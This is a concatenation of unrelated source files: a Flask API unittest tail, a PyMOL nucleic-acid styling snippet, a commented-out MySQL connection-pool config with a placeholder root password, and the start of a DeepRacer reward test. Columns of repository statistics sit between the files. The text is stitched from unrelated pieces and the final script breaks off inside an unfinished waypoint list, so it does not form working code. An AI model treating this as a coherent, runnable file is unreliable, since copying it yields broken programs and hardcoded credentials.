            "Normalization": "ICCF",
            "filetype": "cooler",
            "file": (open("tests/testfiles/test.mcool", "rb"), "test.bed"),
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 400)

    def test_badform_no_fileending_rejected(self):
        """Tests whether form with file without ending is rejected."""
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "SetIdentity",
            "public": "false",
            "Method": "HiC",
            "SizeType": "Interval",
            "filetype": "bedfile",
            "file": (io.BytesIO(b"abcdef"), "test"),
            "Directionality": "-",
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 400)

    def test_wrongly_formatted_bedfile_rejected(self):
        """Tests whether form with wrongly formatted bedfile is rejected."""
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "SetIdentity",
            "Method": "HiC",
            "public": "false",
            "SizeType": "Interval",
            "filetype": "bedfile",
            "file": open("tests/testfiles/wrongly_formatted_bedfile.bed", "rb"),
            "Directionality": "-",
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 400)
        # check whether database entry was removed
        self.assertEqual(0, len(Dataset.query.all()))
        # test whether file was removed, filename will be 1_wrongly_formatted_bedfile.bed
        self.assertFalse(
            os.path.exists(
                os.path.join(
                    TempDirTestCase.TEMP_PATH, "1_wrongly_formatted_bedfile.bed"
                )
            )
        )

    def test_wrongly_formatted_coolerfile_rejected(self):
        """Tests whether form with wrongly formatted/corrupted coolerfile is
        rejected."""
        # construct form data
        data = {
            "datasetName": "test",
            "description": "test-description",
            "assembly": "1",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Interaction",
            "public": "false",
            "Method": "HiC",
            "Normalization": "ICCF",
            "filetype": "cooler",
            "file": (open("tests/testfiles/bad_cooler.mcool", "rb"), "test.mcool"),
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 400)
        # check whether database entry was removed
        self.assertEqual(0, len(Dataset.query.all()))
        # test whether file was removed, filename will be 1_bad_cooler.mcool
        self.assertFalse(
            os.path.exists(
                os.path.join(TempDirTestCase.TEMP_PATH, "1_bad_cooler.mcool")
            )
        )

    @patch("app.models.User.launch_task")
    def test_public_flag_set_correctly_if_true(self, mock_launch_task):
        """Tests whether the public flag is stored as True when the form
        sends public=true."""
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Derived",
            "public": "true",
            "Method": "HiC",
            "SizeType": "Interval",
            "filetype": "bedfile",
            "file": (io.BytesIO(b"abcdef"), "test.bed"),
            "Directionality": "-",
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 200)
        # check if public flag is set correctly
        dataset = Dataset.query.get(1)
        self.assertTrue(dataset.public)

    @patch("app.models.User.launch_task")
    def test_public_flag_set_correctly_if_false(self, mock_launch_task):
        """Tests whether the public flag is stored as False when the form
        sends public=false."""
        # construct form data
        data = {
            "datasetName": "test",
            "assembly": "1",
            "description": "test-description",
            "cellCycleStage": "asynchronous",
            "perturbation": "No perturbation",
            "ValueType": "Derived",
            "public": "false",
            "Method": "HiC",
            "SizeType": "Interval",
            "filetype": "bedfile",
            "file": (io.BytesIO(b"abcdef"), "test.bed"),
            "Directionality": "-",
        }
        # dispatch post request
        response = self.client.post(
            "/api/datasets/",
            data=data,
            headers=self.token_headers,
            content_type="multipart/form-data",
        )
        self.assertEqual(response.status_code, 200)
        # check if public flag is set correctly
        dataset = Dataset.query.get(1)
        self.assertFalse(dataset.public)
if __name__ == "__main__":
    # Run the tests with verbose output; exit=False keeps the interpreter
    # alive after the run so `res` can be inspected interactively.
    res = unittest.main(verbosity=3, exit=False)
| 37.021148
| 120
| 0.545944
| 2,247
| 24,508
| 5.829996
| 0.098353
| 0.020153
| 0.041679
| 0.029847
| 0.865878
| 0.847405
| 0.832137
| 0.826718
| 0.804122
| 0.794886
| 0
| 0.008596
| 0.325934
| 24,508
| 661
| 121
| 37.077156
| 0.784383
| 0.133589
| 0
| 0.78453
| 0
| 0
| 0.291264
| 0.039083
| 0
| 0
| 0
| 0
| 0.075506
| 1
| 0.031308
| false
| 0
| 0.014733
| 0
| 0.049724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f43acebc81a7119fe49a4acd70b1975a9c1442b
| 1,334
|
py
|
Python
|
NucleicAcids/nucleicAcidBackboneTubesSticks.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
NucleicAcids/nucleicAcidBackboneTubesSticks.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
NucleicAcids/nucleicAcidBackboneTubesSticks.py
|
MooersLab/jupyterlabpymolpysnipsplus
|
b886750d63372434df53d4d6d7cdad6cb02ae4e7
|
[
"MIT"
] | null | null | null |
# Description: This code shows the cartoon backbone tube as 65% transparent. It hides the rungs of the cartoon. It shows all of the non-H atoms are sticks. The motivation is to have the cartoon highlight the backbone without dominating the scene.
# Source: Develop ab initio.
# NOTE(review): this is a PyMOL snippet file; `cmd` is provided by the PyMOL
# runtime and is not imported here. The triple-quoted string below is the
# snippet-template form (with ${n:...} tab-stop placeholders); the executable
# commands that follow are the same snippet with defaults filled in.
"""
cmd.do('set bg_rgb, white;')
cmd.do('hide everything, all;')
cmd.do('# Change to the name of your molecular object.;')
cmd.do('show cartoon, ${1:3nd3};')
cmd.do('set cartoon_sampling,1;')
cmd.do('set cartoon_tube_radius, 0.5;')
cmd.do('set cartoon_ladder_mode, 0;')
cmd.do('# Set to 0.0 to turn off transparency;')
cmd.do('set cartoon_transparency, ${2:0.65};')
cmd.do('# The default strick radisu is 0.25. I think it is too thick.;')
cmd.do('set stick_radius ${3:0.12};')
cmd.do('show sticks;')
cmd.do('hide sticks, element H;')
"""
# White background, clean slate.
cmd.do('set bg_rgb, white;')
cmd.do('hide everything, all;')
cmd.do('# Change to the name of your molecular object.;')
cmd.do('show cartoon, 3nd3;')
# Smooth, thin cartoon tube with the base-pair rungs hidden.
cmd.do('set cartoon_sampling,1;')
cmd.do('set cartoon_tube_radius, 0.5;')
cmd.do('set cartoon_ladder_mode, 0;')
cmd.do('# Set to 0.0 to turn off transparency;')
cmd.do('set cartoon_transparency, 0.65;')
cmd.do('# The default strick radisu is 0.25. I think it is too thick.;')
cmd.do('set stick_radius 0.12;')
# Show all heavy atoms as sticks; hide hydrogens.
cmd.do('show sticks;')
cmd.do('hide sticks, element H;')
| 40.424242
| 248
| 0.704648
| 241
| 1,334
| 3.834025
| 0.294606
| 0.140693
| 0.121212
| 0.12987
| 0.75974
| 0.75974
| 0.75974
| 0.75974
| 0.75974
| 0.75974
| 0
| 0.033534
| 0.128186
| 1,334
| 32
| 249
| 41.6875
| 0.760963
| 0.603448
| 0
| 0
| 0
| 0
| 0.715385
| 0.040385
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f5240feb7fd863cf7805added822224cb0d3f6a
| 2,525
|
py
|
Python
|
components/components/utils/pools.py
|
qwert-f/flask
|
00c350f8190c2a6c0eee55031aca0873eb4c91ee
|
[
"MIT"
] | null | null | null |
components/components/utils/pools.py
|
qwert-f/flask
|
00c350f8190c2a6c0eee55031aca0873eb4c91ee
|
[
"MIT"
] | 1
|
2022-01-18T02:54:04.000Z
|
2022-01-18T02:54:44.000Z
|
components/components/utils/pools.py
|
qwert-f/flask
|
00c350f8190c2a6c0eee55031aca0873eb4c91ee
|
[
"MIT"
] | null | null | null |
# # import time
# import pymysql
# # import threading
# # from flask import current_app
# from dbutils.pooled_db import PooledDB
# # ModuleNotFoundError: No module named 'DBUtils'报错的原因是版本是2.0而下面的写法是1.3的写法
# # from DBUtils.PooledDB import PooledDB, SharedDBConnection
#
#
# 方法1.1
# def init_pool(app):
# POOL = PooledDB(
# creator=pymysql, # 使用链接数据库的模块
# maxconnections=6, # 连接池允许的最大连接数,0和None表示不限制连接数
# mincached=2, # 初始化时,链接池中至少创建的空闲的链接,0表示不创建
# maxcached=5, # 链接池中最多闲置的链接,0和None不限制
# maxshared=3, # 链接池中最多共享的链接数量,0和None表示全部共享。
# # PS: 无用,因为pymysql和MySQLdb等模块的 threadsafety都为1,
# # 所有值无论设置为多少,_maxcached永远为0,所以永远是所有链接都共享。
#
# blocking=True, # 连接池中如果没有可用连接后,是否阻塞等待。True,等待;False,不等待然后报错
# maxusage=None, # 一个链接最多被重复使用的次数,None表示无限制
# setsession=[], # 开始会话前执行的命令列表。
# # 如:["set datestyle to ...", "set time zone ..."]
# ping=0,
# # ping MySQL服务端,检查是否服务可用。# 如:0 = None = never,
# # 1 = default = whenever it is requested,
# # 2 = when a cursor is created,
# # 4 = when a query is executed, 7 = always
# host=app.config['PYMYSQL_HOST'],
# port=3306,
# user='root',
# password='sql1',
# database='daily',
# charset='utf8'
# )
# app.config['PYMYSQL_POOL'] = POOL
# 方法2
# import pymysql
# # import threading
# from dbutils.pooled_db import PooledDB
# # ModuleNotFoundError: No module named 'DBUtils'报错的原因是版本是2.0而下面的写法是1.3的写法
# # from DBUtils.PooledDB import PooledDB, SharedDBConnection
# from flask import current_app
# POOL = PooledDB(
# creator=pymysql, # 使用链接数据库的模块
# maxconnections=6, # 连接池允许的最大连接数,0和None表示不限制连接数
# mincached=2, # 初始化时,链接池中至少创建的空闲的链接,0表示不创建
# maxcached=5, # 链接池中最多闲置的链接,0和None不限制
# maxshared=3, # 链接池中最多共享的链接数量,0和None表示全部共享。
# # PS: 无用,因为pymysql和MySQLdb等模块的 threadsafety都为1,
# # 所有值无论设置为多少,_maxcached永远为0,所以永远是所有链接都共享。
#
# blocking=True, # 连接池中如果没有可用连接后,是否阻塞等待。True,等待;False,不等待然后报错
# maxusage=None, # 一个链接最多被重复使用的次数,None表示无限制
# setsession=[], # 开始会话前执行的命令列表。
# # 如:["set datestyle to ...", "set time zone ..."]
# ping=0,
# # ping MySQL服务端,检查是否服务可用。# 如:0 = None = never,
# # 1 = default = whenever it is requested, 2 = when a cursor is created,
# # 4 = when a query is executed, 7 = always
# host=current_app.config['PYMYSQL_HOST'],
# port=3306,
# user='root',
# password='sql1',
# database='daily',
# charset='utf8'
# )
| 36.071429
| 77
| 0.639604
| 261
| 2,525
| 6.145594
| 0.386973
| 0.027431
| 0.029925
| 0.034913
| 0.963217
| 0.899002
| 0.899002
| 0.899002
| 0.899002
| 0.899002
| 0
| 0.028409
| 0.233267
| 2,525
| 69
| 78
| 36.594203
| 0.800103
| 0.929505
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6f69b0328b0111c46976f1f24e67939f278e6126
| 83,591
|
py
|
Python
|
tboneRewardSM_test.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | null | null | null |
tboneRewardSM_test.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | null | null | null |
tboneRewardSM_test.py
|
thh0003/DeepRacer
|
0e639585e8d33a9157c262b7d7cb99e60b0dffc8
|
[
"Apache-2.0"
] | 1
|
2021-02-12T10:06:51.000Z
|
2021-02-12T10:06:51.000Z
|
# model name:
#
from tboneDeepRacerUtils import calcDistanceFromCenter, getClosestWaypoints, getDistanceCenterLine,getCurLocation,inside_borders,speed,progress,direction_and_waypoint,follow_centerline
from tboneDeepRacerHistory import HISTORY
from tboneDeepRacerRaceStep import RaceStep
from tboneRewardSM import reward_function
#stepRewardsCSV = open ("stepRewards.csv", "w", newline='')
#stepLocationsCSV = open ("stepLocations.csv", "w", newline='')
def main():
params = [
{'is_left_of_center': False, 'projection_distance': 0.1399085926407269, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.113037208643439, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9581620420269243, 'all_wheels_on_track': True, 'distance_from_center': 2.42061961851892e-05, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096329005125809, 'object_in_camera': False, 'heading': -0.20270984620429464, 'objects_speed': [], 'progress': 0.7156522898480779, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 1.0},
{'is_left_of_center': False, 'projection_distance': 0.14390030350019378, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.1170200743079786, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9558374100872313, 'all_wheels_on_track': True, 'distance_from_center': 0.0023336167208049628, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096318089179309, 'object_in_camera': False, 'heading': -0.825491610728565, 'objects_speed': [], 'progress': 0.7360704569032253, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 2.0},
{'is_left_of_center': False, 'projection_distance': 0.15196206004735874, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.125078911758613, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.955057360318226, 'all_wheels_on_track': True, 'distance_from_center': 0.0030828964229950976, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096296043067686, 'object_in_camera': False, 'heading': -0.9884467304532386, 'objects_speed': [], 'progress': 0.7773074847674944, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 3.0},
{'is_left_of_center': False, 'projection_distance': 0.16912750229283322, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), 